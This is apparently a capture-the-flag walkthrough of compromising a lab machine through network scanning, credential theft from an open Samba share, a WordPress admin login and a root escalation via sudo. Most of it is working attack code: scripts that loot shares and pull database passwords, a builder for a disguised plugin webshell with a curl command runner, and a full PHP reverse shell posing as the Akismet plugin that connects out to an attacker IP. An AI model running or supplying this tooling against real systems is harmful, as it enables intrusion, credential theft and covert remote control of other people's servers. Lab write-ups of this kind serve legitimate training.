Blind attempt

Information gathering

The classic C-class (/24) sweep:

```plaintext
sudo nmap -sn 61.139.2.0/24
```

This locates the target IP.

Port scan (`-p-` covers all 65535 TCP ports; `--min-rate 10000` forces the pace, which can drop ports on a lossy link, so re-run anything suspicious at a lower rate):

```plaintext
sudo nmap --min-rate 10000 -p- 61.139.2.130
```

Directory scan:

```plaintext
python dirsearch.py -u http://61.139.2.130/ -t 100000
```

This was the first time I learned that dirsearch's -t option sets the thread count; for convenience I just went with 100000.
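The three steps above as one script, with the follow-up a practitioner normally adds: parse the open ports out of the full-range scan and run service detection only against those. This is an added example, not code from the write-up; `NET` is the range used above, the output file names are assumptions, and the grepable nmap output written by `demo_gnmap` is a constructed sample rather than real scan results.

```shell
#!/bin/sh
# Added example: host sweep -> full TCP port sweep -> targeted service scan.
# NET is the /24 from the write-up; everything else is an assumption.

NET="${NET:-61.139.2.0/24}"

# Phase 1: host discovery in grepable form, printing only the hosts that answered.
host_sweep() {
    sudo nmap -sn -oG - "$NET" | awk '/Status: Up/ {print $2}'
}

# Phase 2: fast scan of every TCP port on one host, saved in grepable form.
port_sweep() {
    # $1 = target IP, $2 = output file (.gnmap)
    sudo nmap --min-rate 10000 -p- -oG "$2" "$1"
}

# Turn the "Ports:" field of nmap -oG output into a comma list of open ports,
# so phase 3 probes only what phase 2 found instead of all 65535 again.
open_ports() {
    # $1 = grepable nmap output file
    sed -n 's/.*Ports: //p' "$1" \
      | tr ',' '\n' \
      | awk -F/ '$2 == "open" {gsub(/ /, "", $1); print $1}' \
      | paste -s -d ',' -
}

# Phase 3: version detection plus default scripts, restricted to the open ports.
service_scan() {
    # $1 = target IP, $2 = comma-separated port list from open_ports
    sudo nmap -sV -sC -p "$2" "$1"
}

# Constructed sample of nmap -oG output (not the real target's results) so the
# parser can be exercised offline. Real nmap separates the fields with tabs;
# the parser does not care.
demo_gnmap() {
    f="${TMPDIR:-/tmp}/demo.gnmap"
    cat > "$f" <<'EOF'
# Nmap 7.80 scan initiated (constructed sample)
Host: 61.139.2.130 () Status: Up
Host: 61.139.2.130 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds/// Ignored State: closed (65531)
# Nmap done
EOF
    printf '%s\n' "$f"
}

# Typical use (requires root and the live target):
#   ip=$(host_sweep | head -n 1)
#   port_sweep "$ip" full.gnmap
#   service_scan "$ip" "$(open_ports full.gnmap)"
```

Running `open_ports` on the constructed file yields `22,80,139,445`; on a real `.gnmap` it ignores filtered and closed entries and only emits ports nmap reported as open.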

Web information

Miscellaneous paths

/robots.txt

```plaintext
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/
```
/test

Huh, it only shows the Apache version; nothing else useful.

/old

Same as above.

/TR2

/Backnode_files

There is a lot in here,

but digging through it, they are all front-end files.

phpinfo

Found by the earlier directory scan: /info.php

It shows phpinfo.

There is also a long list of disable_functions. Worth checking which execution functions (system, exec, shell_exec, proc_open, popen) are on it before picking a webshell, since that decides what the shell can call later.

phpmyadmin

There is a login form at the /phpmyadmin route.

/wordpress/wp-login.php

Another login form.

Web penetration

I was trying to work out how to get phpmyadmin's version information. Right, stuck.

Checking the walkthrough

Samba penetration

Samba is the software that implements the SMB protocol on Linux.

First we use an enumeration tool to list what Samba is sharing:

Note the share$ share.

Try connecting; it turns out no password is needed:

Download everything that can be downloaded: (get xxx) (mget .)

Inside we see a wordpress folder. Download files such as config.php (which can leak the database account or password) or license.txt (which might reveal the WordPress version, so that a known vulnerability could be used).

todolist.txt

license.txt

A huge wall of text with no version number in sight; skip it.

deets.txt (password)

It appears to leak some password.

wp-config.php (database password)
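The Samba steps above done non-interactively, plus the loot mining that the text did by eye: pull the anonymous share down in one go, then extract the database credentials from wp-config.php and grep the rest for password notes. This is an added example, not the write-up's own commands; `TARGET` is the IP scanned above and `share$` is the share named above, while `LOOT` and the files written by `demo_loot` are assumptions and constructed samples, not the target's real contents.

```shell
#!/bin/sh
# Added example: anonymous SMB enumeration, bulk download, and credential mining.

TARGET="${TARGET:-61.139.2.130}"
LOOT="${LOOT:-./loot}"

# List the shares with no password (-N). enum4linux -S gives the same view.
smb_list() {
    smbclient -N -L "//$TARGET"
}

# Recursive download of the whole share$ share into LOOT. "prompt OFF" suppresses
# the per-file y/n question that makes "mget *" painful interactively.
smb_loot() {
    mkdir -p "$LOOT"
    smbclient -N "//$TARGET/share\$" -c "recurse ON; prompt OFF; lcd $LOOT; mget *"
}

# Pull the value of define('NAME', 'value') out of a wp-config.php.
wp_define() {
    # $1 = path to wp-config.php, $2 = constant (DB_USER, DB_PASSWORD, DB_HOST, ...)
    sed -n "s/^[[:space:]]*define([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" "$1"
}

# Case-insensitive password hunt across everything downloaded (notes, configs, backups).
hunt_passwords() {
    # $1 = loot directory
    grep -rniE 'passw(or)?d|pwd' "$1"
}

# Constructed stand-in for the downloaded share (not the real files), so the
# parsing functions can be exercised offline.
demo_loot() {
    d="${TMPDIR:-/tmp}/demo-loot"
    mkdir -p "$d/wordpress"
    cat > "$d/deets.txt" <<'EOF'
Reminder for later: the password for the box user is 12345
EOF
    cat > "$d/wordpress/wp-config.php" <<'EOF'
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'S3cretPass' );
define( 'DB_HOST', 'localhost' );
EOF
    printf '%s\n' "$d"
}

# Typical use against the live target:
#   smb_list
#   smb_loot
#   wp_define "$LOOT/wordpress/wp-config.php" DB_USER
#   wp_define "$LOOT/wordpress/wp-config.php" DB_PASSWORD
#   hunt_passwords "$LOOT"
```

The database credentials are the first thing to try against every other login form found during recon (phpmyadmin and wp-login.php here), which is exactly what the next section does.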

WordPress penetration

There is a login form at the /wordpress/wp-login.php route:

Trying the account and password from wp-config straight away: the login succeeds.

Under Plugins there is an Add New option that lets you upload a plugin, so the idea is to upload a webshell:

It seems a .php file cannot be uploaded directly; it wants a zip, so just zip it up?

Still no luck. Looking at the Editor, the PHP plugins all share a fixed header format, so we can mimic it:

I added those header comments and tried again.

666, it went straight through.

I did not know where the file had been uploaded to, and just as I was about to upload it again and capture the request, the error message actually showed the path:

666, cheat mode enabled.

I wanted a reverse shell here, but for some reason it would not connect back, so I just ran commands through system() in this script instead.
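Packaging the upload described above, as an added example that is not the write-up's own code: a one-file plugin whose header comment satisfies WordPress's check (the `Plugin Name:` line is the one it insists on; without it the zip is rejected as containing no valid plugin), a minimal `system()` command runner inside it as in the text, and a curl helper for running commands once it is uploaded. `WP_URL`, the plugin name and the assumed post-upload path under wp-content/plugins are assumptions; the write-up found its real path in the upload error message.

```shell
#!/bin/sh
# Added example: build a WordPress-acceptable plugin zip around a tiny command runner.

PLUGIN="${PLUGIN:-helloshell}"                       # assumed plugin/dir/file name
WP_URL="${WP_URL:-http://61.139.2.130/wordpress}"    # WordPress base URL from the write-up

# WordPress identifies a plugin by the header comment in a top-level .php file
# of the archive. "Plugin Name:" is mandatory; the rest is cosmetic.
plugin_source() {
    cat <<'EOF'
<?php
/*
Plugin Name: Hello Shell
Description: Minimal command runner (added example).
Version: 0.1
*/
if (isset($_GET['cmd'])) {
    header('Content-Type: text/plain');
    system($_GET['cmd']);
}
EOF
}

# Sanity check before uploading: does the file carry the mandatory header line?
header_ok() {
    # $1 = plugin .php file; exit status 0 when the header is present
    grep -q '^Plugin Name:' "$1"
}

# Write the plugin into a directory named after it and zip that directory,
# which is the layout the Add New uploader expects. Prints the zip path.
build_plugin_zip() {
    # $1 = working directory
    mkdir -p "$1/$PLUGIN"
    plugin_source > "$1/$PLUGIN/$PLUGIN.php"
    header_ok "$1/$PLUGIN/$PLUGIN.php" || return 1
    ( cd "$1" && zip -qr "$PLUGIN.zip" "$PLUGIN" ) || return 1
    printf '%s\n' "$1/$PLUGIN.zip"
}

# Run one command through the uploaded file. The path is the usual
# wp-content/plugins/<dir>/<file>.php location (an assumption; confirm it from
# the upload response or error, as the write-up did).
wp_cmd() {
    # $1 = command line to execute on the target
    curl -s -G "$WP_URL/wp-content/plugins/$PLUGIN/$PLUGIN.php" --data-urlencode "cmd=$1"
}

# Typical use:
#   zip=$(build_plugin_zip /tmp/wpplug)   # upload $zip via Plugins > Add New
#   wp_cmd 'id'
#   wp_cmd 'ls -la /home'
```

Keep the runner behind a parameter name that is not guessable or delete it once done; an unauthenticated command runner left under wp-content/plugins is exactly the kind of artifact a later scan of the same box would find.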

The privileges here are still fairly low.

Remember the weak password 12345 we had not used yet? We can guess there are other users on this Linux system and that the password might be this one.

Read the /home directory directly:

Sure enough there is a togie user; we switch to it with su.

Here is the problem:

su can only be used from an interactive terminal.

I later watched the video and found that the reverse shell here has to be written into the PHP script itself; you cannot spawn it with a command run through system()...

```php
<?php
/**
 * @package Akismet
 */
/*
Plugin Name: Akismet Anti-Spam
Plugin URI: https://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
Version: 3.3.3
Author: Automattic
Author URI: https://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

Copyright 2005-2015 Automattic, Inc.
*/

// Make sure we don't expose any info if called directly

set_time_limit (0);
$VERSION = "1.0";
$ip = '61.139.2.128'; // CHANGE THIS
$port = 1234;         // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    global $daemon; // without this the function sees an undefined local and always prints
    if (!$daemon) {
        print "$string\n";
    }
}

?>
```

Connected successfully:

Privileges are low.

Still cannot switch to togie with su directly.

I later searched and found that the problem is here.

When the reverse shell first connected, it echoed:

The solutions are:

Method one failed; trying method two:

The python -c command runs fine.

Connected successfully.

The password is 12345, already known from earlier.

sudo -l shows that every command can be run via sudo.

Just spawn a shell with sudo and that is root:

Looking in /root there is the proof.txt flag; penetration complete.
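The post-exploitation steps above (detect the missing tty, upgrade the shell so su works, check sudo -l, escalate) as small shell functions, added here as an example and not taken from the write-up. The tty upgrade is the standard python pty.spawn one-liner, which is what "the python -c command runs fine" refers to; the `sudo -l` listings written by the `demo_sudo_l*` functions are constructed samples, and the user name togie plus the hostname `target` in them are placeholders.

```shell
#!/bin/sh
# Added example: tty check, tty upgrade, and a check on what `sudo -l` grants.

# su and sudo want a controlling terminal; a reverse shell over a bare socket
# has none, which is why "su togie" failed from the first shell.
have_tty() {
    [ -t 0 ] && [ -t 1 ]
}

# Print the one-liner that wraps a shell in a pseudo-terminal, for whichever
# python the target has. Run the printed command inside the reverse shell.
tty_upgrade_cmd() {
    for py in python3 python python2; do
        if command -v "$py" >/dev/null 2>&1; then
            printf "%s -c 'import pty; pty.spawn(\"/bin/bash\")'\n" "$py"
            return 0
        fi
    done
    return 1
}

# Does a saved `sudo -l` listing grant every command? Matches lines such as
# "(ALL : ALL) ALL", "(ALL) ALL" and "(root) NOPASSWD: ALL", but not a single
# binary like "(root) NOPASSWD: /usr/bin/vim".
sudo_unrestricted() {
    # $1 = file holding the output of `sudo -l`
    grep -Eq '^[[:space:]]*\((ALL|root)([[:space:]]*:[[:space:]]*ALL)?\)[[:space:]]+(NOPASSWD:[[:space:]]*)?ALL[[:space:]]*$' "$1"
}

# Constructed sample: unrestricted sudo, as found on the box. Prints the file path.
demo_sudo_l() {
    f="${TMPDIR:-/tmp}/sudo-all.txt"
    cat > "$f" <<'EOF'
Matching Defaults entries for togie on target:
    env_reset, mail_badpass

User togie may run the following commands on target:
    (ALL : ALL) ALL
EOF
    printf '%s\n' "$f"
}

# Constructed sample: a limited grant, to show the check does not fire on it.
demo_sudo_l_limited() {
    f="${TMPDIR:-/tmp}/sudo-limited.txt"
    cat > "$f" <<'EOF'
User www-data may run the following commands on target:
    (root) NOPASSWD: /usr/bin/vim
EOF
    printf '%s\n' "$f"
}

# Sequence inside the reverse shell, once it is upgraded:
#   have_tty || tty_upgrade_cmd      # run the printed line, then:
#   su togie                         # password: 12345 (from deets.txt)
#   sudo -l > /tmp/sudo-l.txt
#   sudo_unrestricted /tmp/sudo-l.txt && sudo -i   # root shell; cat /root/proof.txt
```

When `sudo_unrestricted` does not fire, the listed binaries still deserve a look (editors, interpreters and file utilities run as root are usually enough), but that is a different route from the one this box needed.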